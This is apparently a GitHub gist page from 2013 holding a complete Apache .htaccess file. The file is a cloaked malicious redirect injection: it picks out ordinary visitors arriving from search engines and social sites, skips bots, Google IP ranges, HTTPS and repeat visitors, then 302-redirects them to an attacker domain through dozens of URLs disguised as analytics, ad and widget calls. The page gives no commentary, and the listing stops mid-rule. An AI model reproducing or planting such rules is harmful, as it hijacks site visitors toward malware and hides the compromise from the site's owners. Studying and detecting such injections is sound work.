Skip to content

Instantly share code, notes, and snippets.

@buk
Created August 27, 2013 11:20
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save buk/6352322 to your computer and use it in GitHub Desktop.
Save buk/6352322 to your computer and use it in GitHub Desktop.
<IfModule prefork.c>
RewriteEngine On
RewriteCond %{REQUEST_METHOD} ^GET$
RewriteCond %{HTTP_REFERER} ^(http\:\/\/)?([^\/\?]*\.)?(tweet|twit|linkedin|instagram|facebook\.|myspace\.|bebo\.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http\:\/\/)?([^\/\?]*\.)?(hi5\.|blogspot\.|friendfeed\.|friendster\.|google\.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http\:\/\/)?([^\/\?]*\.)?(yahoo\.|bing\.|msn\.|ask\.|excite\.|altavista\.|netscape\.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http\:\/\/)?([^\/\?]*\.)?(aol\.|hotbot\.|goto\.|infoseek\.|mamma\.|alltheweb\.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http\:\/\/)?([^\/\?]*\.)?(lycos\.|metacrawler\.|mail\.|pinterest|instagram).*$ [NC]
RewriteCond %{HTTP_REFERER} !^.*(imgres).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(bing|Accoona|Ace\sExplorer|Amfibi|Amiga\sOS|apache|appie|AppleSyndication).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Archive|Argus|Ask\sJeeves|asterias|Atrenko\sNews|BeOS|BigBlogZoo).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Biz360|Blaiz|Bloglines|BlogPulse|BlogSearch|BlogsLive|BlogsSay|blogWatcher).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Bookmark|bot|CE\-Preload|CFNetwork|cococ|Combine|Crawl|curl|Danger\shiptop).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Diagnostics|DTAAgent|EmeraldShield|endo|Evaal|Everest\-Vulcan).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(exactseek|Feed|Fetch|findlinks|FreeBSD|Friendster|Fuck\sYou|Google).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Gregarius|HatenaScreenshot|heritrix|HolyCowDude|Honda\-Search|HP\-UX).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(HTML2JPG|HttpClient|httpunit|ichiro|iGetter|IRIX|Jakarta|JetBrains).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Krugle|Labrador|larbin|LeechGet|libwww|Liferea|LinkChecker).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(LinknSurf|Linux|LiveJournal|Lonopono|Lotus\-Notes|Lycos|Lynx|Mac\_PowerPC).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Mac\_PPC|Mac\s10|macDN|Mediapartners|Megite|MetaProducts).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Miva|Mobile|NetBSD|NetNewsWire|NetResearchServer|NewsAlloy|NewsFire).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(NewsGatorOnline|NewsMacPro|Nokia|NuSearch|Nutch|ObjectSearch|Octora).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(OmniExplorer|Omnipelagos|Onet|OpenBSD|OpenIntelligenceData|oreilly).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(os\=Mac|P900i|panscient|perl|PlayStation|POE\-Component|PrivacyFinder).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(psycheclone|Python|retriever|Rojo|RSS|SBIder|Scooter|Seeker|Series\s60).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(SharpReader|SiteBar|Slurp|Snoopy|Soap\sClient|Socialmarks|Sphere\sScout).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(spider|sproose|Rambler|Straw|subscriber|SunOS|Surfer|Syndic8).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Syntryx|TargetYourNews|Technorati|Thunderbird|Twiceler|urllib|Validator).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Vienna|voyager|W3C|Wavefire|webcollage|Webmaster|WebPatrol|wget|Win\s9x).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Win16|Win95|Win98|Windows\s95|Windows\s98|Windows\sCE|Windows\sNT\s4).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(WinHTTP|WinNT4|WordPress|WWWeasel|wwwster|yacy|Yahoo).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Yandex|Yeti|YouReadMe|Zhuaxia|ZyBorg).*$ [NC]
RewriteCond %{REQUEST_FILENAME} !.*jpg$|.*gif$|.*png|.*jpeg|.*mpg|.*avi|.*zip|.*gz|.*tar|.*ico$ [NC]
RewriteCond %{REMOTE_ADDR} !^66\.249.*$ [NC]
RewriteCond %{REMOTE_ADDR} !^74\.125.*$ [NC]
RewriteCond %{HTTP_COOKIE} !^.*dEY.*$ [NC]
RewriteCond %{HTTP_USER_AGENT} .*(Windows|Macintosh|iPad|iPhone|iPod|Android).* [NC]
RewriteCond %{HTTPS} ^off$
RewriteRule .* - [E=dEY:%{TIME_SEC}]
RewriteRule .* - [E=iby:sopulu.vehicleservicediscount.com]
RewriteCond %{ENV:dEY} 0
RewriteRule ^.* http://%{ENV:iby}/getSegment.php?purl=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&jsref=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&rnd=1341558315029 [R=302,NE,L,CO=dEY:%{ENV:dEY}:%{HTTP_HOST}:11646:/:0:HttpOnly]
RewriteCond %{ENV:dEY} 1
RewriteRule ^.* http://%{ENV:iby}/api/getCount2.php?cb=stButtons.processCB&refDomain=www.mangahere.com&refQuery=manga/hapi_mari/v01/c005/30.html&pgurl=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&pubKey=e47efe7d-147b-4731-ac42-9838ccdc52f2&url=http\%3A\%2F\%2F%{HTTP_HOST}\%2F [R=302,NE,L,CO=dEY:%{ENV:dEY}:%{HTTP_HOST}:10557:/:0:HttpOnly]
RewriteCond %{ENV:dEY} 2
RewriteRule ^.* http://%{ENV:iby}/imghover?iact=hm&ei=wQXgT6XOJcjOrQe-orSEDQ&q=creative+advertising+truck&tbs=&page=2&tbnh=141&tbnw=214&start=18&ndsp=22&dur=219&tbnid=4nSM529Rx__HPM:&hovh=178&hovw=256&vpx=639&vpy=331&imgurl=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&imgrefurl=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&ved=1t:1527,r:19,s:18,i:188&vetl=ms [R=302,NE,L,CO=dEY:%{ENV:dEY}:%{HTTP_HOST}:9740:/:0:HttpOnly]
RewriteCond %{ENV:dEY} 3
RewriteRule ^.* http://%{ENV:iby}/getSegment.php?purl=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&jsref=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&rnd=1340340403487 [R=302,NE,L,CO=dEY:%{ENV:dEY}:%{HTTP_HOST}:9910:/:0:HttpOnly]
RewriteCond %{ENV:dEY} 4
RewriteRule ^.* http://%{ENV:iby}/avatar/bfb4ac7b616566f7550d62e950125f74?s=80&d=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&r=G [R=302,NE,L,CO=dEY:%{ENV:dEY}:%{HTTP_HOST}:10130:/:0:HttpOnly]
RewriteCond %{ENV:dEY} 5
RewriteRule ^.* http://%{ENV:iby}/ps/ifr?container=friendconnect&mid=0&nocache=0&view=profile&parent=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&url=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&communityId=17603825019522784883&caller=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&rpctoken=650923846&locale=en_US [R=302,NE,L,CO=dEY:%{ENV:dEY}:%{HTTP_HOST}:11737:/:0:HttpOnly]
RewriteCond %{ENV:dEY} 6
RewriteRule ^.* http://%{ENV:iby}/stats.js?cleartogo=1&cc=&refpp=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&site=5013&icon=1&sw=1280&hw=800&color=32&f=1&uiqGTOP=&cc=&hascookie=1&1XcAdGTOP=&j=0&c=1&lang=es&timezone=23&referer=4gifs.com&word=/gallery/v/Soccer_actors.gif.html&browser=5&os=10&swords=0&-&fromd=4gifs.com&fromp=/gallery/v/Truck_explosion.gif.html&0 [R=302,NE,L,CO=dEY:%{ENV:dEY}:%{HTTP_HOST}:9456:/:0:HttpOnly]
RewriteCond %{ENV:dEY} 7
RewriteRule ^.* http://%{ENV:iby}/__utm.gif?utmwv=5.3.3&utms=1&utmn=1911197694&utmhn=entertainment.kompas.com&utmcs=UTF-8&utmsr=1024x768&utmvp=1008x638&utmsc=24-bit&utmul=en-us&utmje=0&utmfl=10.3\%20r181&utmdt=Soal\%20Rambut\%2C\%20Justin\%20Bieber\%20Kalah\%20dari\%20Harry\%20\%22One\%20Direction\%22\%20-\%20KOMPAS.com&utmhid=530646182&utmr=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&utmp=/read/2012/07/09/09282635/Soal.Rambut.Justin.Bieber.Kalah.dari.Harry.One.Direction&utmac=UA-3374285-1&utmcc=__utma\%3D70569423.316608331.1341801345.1341801345.1341801345.1\%3B\%2B__utmz\%3D70569423.1341801345.1.1.utmcsr\%3Dkompas.com\%7Cutmccn\%3D(referral)\%7Cutmcmd\%3Dreferral\%7Cutmcct\%3D/\%3B&utmu=qhAg~ [R=302,NE,L,CO=dEY:%{ENV:dEY}:%{HTTP_HOST}:9544:/:0:HttpOnly]
RewriteCond %{ENV:dEY} 8
RewriteRule ^.* http://%{ENV:iby}/delivery/lg.php?bannerid=23834&campaignid=2475&zoneid=1813&channel_ids=,&loc=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&cb=04ee620e5a [R=302,NE,L,CO=dEY:%{ENV:dEY}:%{HTTP_HOST}:10779:/:0:HttpOnly]
RewriteCond %{ENV:dEY} 9
RewriteRule ^.* http://%{ENV:iby}/__utm.gif?utmwv=5.3.3&utms=3&utmn=849887004&utmhn=pilkada.kompas.com&utmcs=UTF-8&utmsr=1280x720&utmvp=1263x581&utmsc=24-bit&utmul=en-us&utmje=0&utmfl=11.1\%20r102&utmdt=Jelang\%20Pencoblosan\%2C\%20Kampanye\%20Hitam\%20Serang\%20Alex\%20Noerdin\%20Beredar\%20-\%20LIPSUS\%20Jakarta1&utmhid=1655014404&utmr=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&utmp=/berita/read/2012/07/10/16194765/Jelang.Pencoblosan.Kampanye.Hitam.Serang.Alex.Noerdin.Beredar&utmac=UA-9470746-37&utmcc=__utma\%3D83180439.1009696269.1336354517.1341807300.1341913786.16\%3B\%2B__utmz\%3D83180439.1341913786.16.16.utmcsr\%3Dkompas.com\%7Cutmccn\%3D(referral)\%7Cutmcmd\%3Dreferral\%7Cutmcct\%3D/\%3B&utmu=qAAg~ [R=302,NE,L,CO=dEY:%{ENV:dEY}:%{HTTP_HOST}:9600:/:0:HttpOnly]
RewriteCond %{ENV:dEY} 10
RewriteRule ^.* http://%{ENV:iby}/t.gif?_=1342085269650&count=horizontal&counturl=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&id=twitter-widget-0&lang=en&original_referer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&size=m&text=Baju-Jaket-Cowok-IKC-334&url=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&type=share&twttr_referrer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&twttr_widget=1&twttr_hask=0&twttr_li=0&twttr_pid=v3:1340771580973652408035798 [R=302,NE,L,CO=dEY:%{ENV:dEY}:%{HTTP_HOST}:11214:/:0:HttpOnly]
RewriteCond %{ENV:dEY} 11
RewriteRule ^.* http://%{ENV:iby}/widget/v3/data/?callback=jQuery152006934404337191502_1341559113192&component=burma&uid=12309ef6602-4&data=data&width=360&height=300&curl=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&hints=Flower+frame+vector&mid=xeAU0pMI4mIbEFOsx9VcND&publisher_id=110696f3420&config_id=99ab10c859 [R=302,NE,L,CO=dEY:%{ENV:dEY}:%{HTTP_HOST}:11580:/:0:HttpOnly]
RewriteCond %{ENV:dEY} 12
RewriteRule ^.* http://%{ENV:iby}/s?md=1&len=205.539&csipt=watch5&rt=1042.776&cr=ID&et=179.146&nsivbblmax=315146.000&st=166.533&volume=100&nsidf=4&h=360&feature=endscreen&nsivbblmean=163972.199&lact=658644&nsivbblc=341&bc=21309492&vw=320&rendering=software&vh=240&el=detailpage&sdetail=n:1\%2Cf:endscreen\%2Crv:1CiUJ9GvyPw&fmt=34&nsiabblmax=74997.000&tsphab=1&decoding=software&vid=tyyZmhZQhpi1re4lfPAwnGOgRj3x4qRnC&nsiabblmean=40374.871&nsiabblmin=683.000&tspfdt=1516&sd=B4A7D60E4HH1340698326930970&hbt=119.481&w=480&tspne=0&sourceid=yw&hbd=4246883&nsivbblmin=20.000&ns=yt&vtmp=1&fvid=xBMIU9nMQyY&docid=GNA9ff42y1k&nsiabblc=334&plid=AATDW6dHT5w3_GSs&hasstoryboard=1&fexp=920704,921602,912804,913542,907335,922600,903114,913547,919324,906510,907344,907217,919306,912706,919316,902518,924500,915101&hl=en_US&tpmt=176&ptk=youtube_none&cfps=6.2015503875969&screenw=1280&referrer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&screenh=720&bd=937443&playerw=640&audiofactor=0.5339492852971126&playerh=390&bt=41.774&scoville=1&sendtmp=1&pd=27.360&mos=0&fs=0&nbe=2&vq=auto [R=302,NE,L,CO=dEY:%{ENV:dEY}:%{HTTP_HOST}:10749:/:0:HttpOnly]
RewriteCond %{ENV:dEY} 13
RewriteRule ^.* http://%{ENV:iby}/pview?event=pview&fpc=d96b1f4-137eaa87da1-3bf81330-3161&sessionID=1340266518403.56116&sourceURL=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&hostname=www.mangahere.com&location=/manga/ojousama_no_himitsu/v01/c004/9.html&publisher=e47efe7d-147b-4731-ac42-9838ccdc52f2&shareHash=sthash.L5UJSb8h&incomingHash=&refDomain=www.mangahere.com&refQuery=manga/ojousama_no_himitsu/v01/c004/8.html&url=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&sharURL=&source=share5x&title=Ojousama\%20no\%20Himitsu\%204\%20-\%20Read\%20Ojousama\%20no\%20Himitsu\%20Chapter\%204\%20Online\%20-\%20Page\%209&ts1340266518405.0= [R=302,NE,L,CO=dEY:%{ENV:dEY}:%{HTTP_HOST}:9111:/:0:HttpOnly]
RewriteCond %{ENV:dEY} 14
RewriteRule ^.* http://%{ENV:iby}/t.gif?url=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&counturl=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&text=LD\%20002\%20-\%20Lace\%20Dress\%20Light\%20Blue&count=horizontal&lang=en&via=tokobagus&type=share&size=m&twttr_referrer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&twttr_widget=0&twttr_hask=0&twttr_li=0&twttr_pid=v3:1341193202452358260454838 [R=302,NE,L,CO=dEY:%{ENV:dEY}:%{HTTP_HOST}:10953:/:0:HttpOnly]
RewriteCond %{ENV:dEY} 15
RewriteRule ^.* http://%{ENV:iby}/neo/darla/php/fc.php?trace=msgread_tabview&tID=3&d=0&f=978532163&l=SKY\%2CREC\%2CMNW&rn=1342176828565&en=utf-8&mb_s_en=utf-8&filter=no_expandable\%253Bajax_cert_expandable\%253Bexp_iframe_expandable\%253B&ref=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&sa=content\%253D\%2522minty_tenure\%253A\%2520week\%25203+\%2522\%2520uccc\%253D\%2522qq.com\%253BEmail\%2520Masuk\%2522& [R=302,NE,L,CO=dEY:%{ENV:dEY}:%{HTTP_HOST}:10173:/:0:HttpOnly]
RewriteCond %{ENV:dEY} 16
RewriteRule ^.* http://%{ENV:iby}/delivery/lg.php?bannerid=29308&campaignid=4402&zoneid=1823&channel_ids=,&loc=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&referer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&cb=fdaec958c2 [R=302,NE,L,CO=dEY:%{ENV:dEY}:%{HTTP_HOST}:10120:/:0:HttpOnly]
RewriteCond %{ENV:dEY} 17
RewriteRule ^.* http://%{ENV:iby}/tracker?event=video_impression&source=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&video_duration=239&domain=videocloud&playlist=1521712908001&video=1501416059001&platform=as3&time=1340351227828&flash_version=WIN\%2010\%2C1\%2C102\%2C64&embed=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&account=89804535001&player_name=Direct\%20Lyrics\%20Sidebar\%20Playlist\%20Player(TEMP)&player=1522730664001&video_name=Taylor\%20Swift\%20Music\%20Video\%20For\%20The\%20Hunger\%20Games [R=302,NE,L,CO=dEY:%{ENV:dEY}:%{HTTP_HOST}:11728:/:0:HttpOnly]
RewriteCond %{ENV:dEY} 18
RewriteRule ^.* http://%{ENV:iby}/event.js?thread_slug=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&user_type=anon&referrer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&active_switches=\%5B\%22olark_admin_addons\%22\%2C\%22digests:add\%22\%2C\%22discovery_on_user_activity\%22\%2C\%22es_index_threads\%22\%2C\%22limit_get_posts_days_30d\%22\%2C\%22discovery_best_comment\%22\%2C\%22html_email\%22\%2C\%22phoenix_reputation\%22\%2C\%22firehose\%22\%2C\%22olark_admin_packages\%22\%2C\%22upload_media\%22\%2C\%22firehose_gnip_http\%22\%2C\%22transitional_sessions\%22\%2C\%22statsd_created\%22\%2C\%22bespin\%22\%2C\%22firehose_pubsub\%22\%2C\%22firehose_message_db_lookup\%22\%2C\%22digests\%22\%2C\%22shardvote\%22\%2C\%22juggler_thread_onReady\%22\%2C\%22discovery_network\%22\%2C\%22redis_sessions\%22\%2C\%22edits_to_spam\%22\%2C\%22embedapi\%22\%2C\%22shorten_notifications_links\%22\%2C\%22ssl\%22\%2C\%22website_2012_deploy\%22\%2C\%22shardpost:index\%22\%2C\%22usertransformer_reputation\%22\%2C\%22fingerprint\%22\%2C\%22send_to_impermium\%22\%2C\%22firehose_push\%22\%2C\%22shardpost\%22\%2C\%22train_impermium\%22\%2C\%22shardvote:backfills\%22\%2C\%22show_captcha_on_links\%22\%2C\%22website_base_template\%22\%2C\%22firehose_pubsub_throttle\%22\%2C\%22new_moderate\%22\%2C\%22use_rs_paginator_60m\%22\%2C\%22redis_threadcount\%22\%2C\%22shardvote:index\%22\%2C\%22listactivity_replies\%22\%2C\%22juggler_enabled\%22\%2C\%22next_thread_sharing\%22\%2C\%22use_master_for_api\%22\%2C\%22next_raven\%22\%2C\%22next_realtime:indicators\%22\%2C\%22moderate_ascending\%22\%2C\%22notifications:generate_msgid\%22\%2C\%22community_icon\%22\%2C\%22static_styles\%22\%2C\%22stats\%22\%2C\%22realtime\%22\%2C\%22redis_notification_tokens\%22\%2C\%22realtime_cached\%22\%2C\%22olark_support\%22\%2C\%22firehose_gnip\%22\%2C\%22discovery_on_content\%22\%2C\%22digests:process\%22\%2C\%22olark_addons\%22\%2C\%22phoenix_optout\%22\%2C\%22use_impermium\%22\%2C\%22shardvote:api\%22\%2C\%22phoenix\%22\%2C\%22discovery_redirect_event\%22\%2C\%22new_thread_create\%22\%2C\%22autocommitted_thread\%22\%2C\%22theme_editor_disabled\%22\%2C\%22next_realtime\%22\%2C\%22notifications\%22\%2C\%22listactivity_replies_30d\%22\%2C\%22statsd.timings\%22\%2C\%22git_themes\%22\%2C\%22google_analytics\%22\%2C\%22mentions\%22\%2C\%22olark_install\%22\%5D&theme=Houdini&prev_imp=1340775043188616087&event=init_embed&thread=740554669&forum=metrosiantar&forum_id=1424567&imp=1340775043188616087 [R=302,NE,L,CO=dEY:%{ENV:dEY}:%{HTTP_HOST}:11087:/:0:HttpOnly]
RewriteCond %{ENV:dEY} 19
RewriteRule ^.* http://%{ENV:iby}/imghover?iact=hm&ei=S5b3T73uM4jOrQeSjP3CBg&q=bear+hug&tbs=&page=2&tbnh=131&tbnw=116&start=23&ndsp=30&dur=502&tbnid=2Pxx19JSQho4YM:&hovh=168&hovw=150&vpx=999&vpy=236&imgurl=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&imgrefurl=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&ved=1t:1527,r:29,s:23,i:233&vetl=ms [R=302,NE,L,CO=dEY:%{ENV:dEY}:%{HTTP_HOST}:9704:/:0:HttpOnly]
RewriteCond %{ENV:dEY} 20
RewriteRule ^.* http://%{ENV:iby}/b?c1=8&c2=6864323&rn=0.5698859629799627&c7=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&c3=996&c4=&c5=&c6=&c10=&c15=&c16=&c8=Jual\%20Jaket\%20up\%20to\%20date-harga\%20grosir\%20-\%20IndoForum&c9=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&cv=1.8 [R=302,NE,L,CO=dEY:%{ENV:dEY}:%{HTTP_HOST}:10413:/:0:HttpOnly]
RewriteCond %{ENV:dEY} 21
RewriteRule ^.* http://%{ENV:iby}/st?_PVID=4HNvqWoKp3GAxZXiTi5fwgAJyokXaE_6lEUADyEh&cnt=yan&ad_type=iframe&ad_size=180x150&entity=24276&site_code=mail&section_code=15167784&cb=1341822022068010&yud=zip\%3D\%26ycg\%3Dm\%26yyob\%3D1955&pub_redirect_unencoded=1&pub_redirect=http\%3A\%2F\%2F%{HTTP_HOST}\%2F [R=302,NE,L,CO=dEY:%{ENV:dEY}:%{HTTP_HOST}:9758:/:0:HttpOnly]
RewriteCond %{ENV:dEY} 22
RewriteRule ^.* http://%{ENV:iby}/avatar/7254a03f8bdf006c4f927b264b0e5698?s=50&d=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&r=G [R=302,NE,L,CO=dEY:%{ENV:dEY}:%{HTTP_HOST}:11631:/:0:HttpOnly]
RewriteCond %{ENV:dEY} 23
RewriteRule ^.* http://%{ENV:iby}/b?c1=8&c2=6135404&c3=28&c4=13310&c10=3197034&ns__t=1341635723960&ns_c=ISO-8859-1&c8=&c7=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&c9=http\%3A\%2F\%2F%{HTTP_HOST}\%2F [R=302,NE,L,CO=dEY:%{ENV:dEY}:%{HTTP_HOST}:10943:/:0:HttpOnly]
RewriteCond %{ENV:dEY} 24
RewriteRule ^.* http://%{ENV:iby}/imp?Z=300x250&atf=1&brw=ff3&c=72&ck=1&dir=0&disp=none&efo=0&nsafe=general&os=wxp&pas=0&pfm=1&prm=0&u=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&q=noba&referrer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&reftype=none&rtg=pg&s=al&s=2876798&tlfs=ch&tphv=ch&uatRandNo=4309&_salt=2264439318&B=10&r=0 [R=302,NE,L,CO=dEY:%{ENV:dEY}:%{HTTP_HOST}:10507:/:0:HttpOnly]
RewriteCond %{ENV:dEY} 25
RewriteRule ^.* http://%{ENV:iby}/b/ss/jobsdb-prd-id/1/H.23.6/s92113273052077?AQB=1&ndh=1&t=20/5/2012\%2011:24:8\%203\%20-420&ce=UTF-8&ns=jobsdb&pageName=search/resultpage1&g=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&r=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&server=id.jobsdb.com&v0=JobAlert&events=event5\%2Cevent25\%2Cevent38\%2Cevent1&c1=EN&v1=EN&c2=search&v2=search&c4=logged\%20out:search/resultpage1&v4=logged\%20out&c5=/id/en/search.mvc/findjobs&v5=/id/en/search.mvc/findjobs&c6=D\%3Dg&v6=D\%3Dg&c10=D\%3Ds_vi&v10=D\%3Ds_vi&c11=Job\%20Alert\%20Email\%20Search&v11=Job\%20Alert\%20Email\%20Search&v23=Preview&c27=Business\%20Development(58)&v27=Business\%20Development(58)&v38=JobAlert&v39=REPY&v40=email&h1=search/resultpage1&l1=Business\%20Development(58)&s=1024x768&c=24&j=1.7&v=N&k=Y&bw=1013&bh=534&p=2007\%20Microsoft\%20Office\%20system\%3BMozilla\%20Default\%20Plug-in\%3BShockwave\%20Flash\%3BWindows\%20Presentation\%20Foundation\%3BAdobe\%20Acrobat\%3BMicrosoft\%C2\%AE\%20DRM\%3BWindows\%20Media\%20Player\%20Plug-in\%20Dynamic\%20Link\%20Library\%3B&AQE=1 [R=302,NE,L,CO=dEY:%{ENV:dEY}:%{HTTP_HOST}:9268:/:0:HttpOnly]
RewriteCond %{ENV:dEY} 26
RewriteRule ^.* http://%{ENV:iby}/b/ss/aa-airasia-id-prd,aa-airasia-global/1/H.24.1/s98131530406321?AQB=1&ndh=1&t=20/5/2012\%2011:32:57\%203\%20-420&ce=UTF-8&ns=airasia&cdp=2&pageName=www.airasia.com:id:en:promotion:rr1590608.page&g=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&r=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&server=www.airasia.com&events=event1&c1=id&v1=id&c2=en&v2=en&c3=promotion&v3=promotion&v6=Wednesday&v7=1:30PM&v26=www.airasia.com:id:en:promotion:rr1590608.page&s=1024x768&c=24&j=1.7&v=N&k=Y&bw=1024&bh=578&p=2007\%20Microsoft\%20Office\%20system\%3BMozilla\%20Default\%20Plug-in\%3BShockwave\%20Flash\%3BAdobe\%20Acrobat\%3BMicrosoft\%C2\%AE\%20DRM\%3BWindows\%20Media\%20Player\%20Plug-in\%20Dynamic\%20Link\%20Library\%3B&pid=www.airasia.com:id:en:home.page&pidt=1&oid=functiononclick(event)\%7Bjavascript:window.open(\%22http\\%3A\\%2F\\%2Fwww.airasia.com/id/en/promotion/rr1590608.page&oidt=2&ot=A&AQE=1 [R=302,NE,L,CO=dEY:%{ENV:dEY}:%{HTTP_HOST}:9718:/:0:HttpOnly]
RewriteCond %{ENV:dEY} 27
RewriteRule ^.* http://%{ENV:iby}/b?c1=8&c2=6135404&c3=28&c4=13310&c10=3234390&ns__t=1341447523824&ns_c=ISO-8859-1&c8=&c7=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&c9=http\%3A\%2F\%2F%{HTTP_HOST}\%2F [R=302,NE,L,CO=dEY:%{ENV:dEY}:%{HTTP_HOST}:9970:/:0:HttpOnly]
RewriteCond %{ENV:dEY} 28
RewriteRule ^.* http://%{ENV:iby}/__utm.gif?utmwv=4.3as&utmn=878467874&utmhn=mw.50cubes.com&utmcs=UTF-8&utmsr=1024x768&utmsc=24-bit&utmul=en-us&utmje=0&utmfl=10.3\%20r181&utmdt=Mall\%20World\%20on\%20Facebook&utmhid=2011770177&utmr=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&count=0&utmp=MallWorldFlash/Modal/ItemShopper/2702&utmac=UA-1040208-4&utmcn=1&utmcc=__utma\%3D1.1725423775876128800.1340082121.1340082121.1340082121.1\%3B\%2B__utmz\%3D1.1340082121.1.1.utmcsr\%3Dapps.facebook.com\%7Cutmccn\%3D(referral)\%7Cutmcmd\%3Dreferral\%7Cutmcct\%3D/mallworldgame/\%3B [R=302,NE,L,CO=dEY:%{ENV:dEY}:%{HTTP_HOST}:10014:/:0:HttpOnly]
RewriteCond %{ENV:dEY} 29
RewriteRule ^.* http://%{ENV:iby}/b?c1=2&c2=8443234&ns__t=1342147361232&ns_c=UTF-8&c8=detikNews\%20:\%20Pemudik\%20yang\%20Nekat\%20Naik\%20Sepeda\%20Motor\%20Akan\%20Ditindak\%20Tegas&c7=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&c9=http\%3A\%2F\%2F%{HTTP_HOST}\%2F [R=302,NE,L,CO=dEY:%{ENV:dEY}:%{HTTP_HOST}:10311:/:0:HttpOnly]
RewriteCond %{ENV:dEY} 30
RewriteRule ^.* http://%{ENV:iby}/__utm.gif?utmwv=5.3.2&utms=141&utmn=105273647&utmhn=www.yuktravel.com&utmcs=UTF-8&utmsr=1133x850&utmsc=24-bit&utmul=en-us&utmje=0&utmfl=10.0\%20r22&utmdt=Yuktravel\%20-\%20Indonesia\%20No.1\%20Online\%20Travel&utmhid=1865849935&utmr=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&utmp=/travel-insurance&utmac=UA-24781983-3&utmcc=__utma\%3D156601188.775106532.1339462897.1339462897.1340861926.2\%3B\%2B__utmz\%3D156601188.1340861926.2.2.utmcsr\%3Dweddingku.com\%7Cutmccn\%3D(referral)\%7Cutmcmd\%3Dreferral\%7Cutmcct\%3D/\%3B&utmu=qB~ [R=302,NE,L,CO=dEY:%{ENV:dEY}:%{HTTP_HOST}:9223:/:0:HttpOnly]
RewriteCond %{ENV:dEY} 31
RewriteRule ^.* http://%{ENV:iby}/delivery/ajs.php?zoneid=1047&cb=69307961707&charset=UTF-8&loc=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&referer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F [R=302,NE,L,CO=dEY:%{ENV:dEY}:%{HTTP_HOST}:10314:/:0:HttpOnly]
RewriteCond %{ENV:dEY} 32
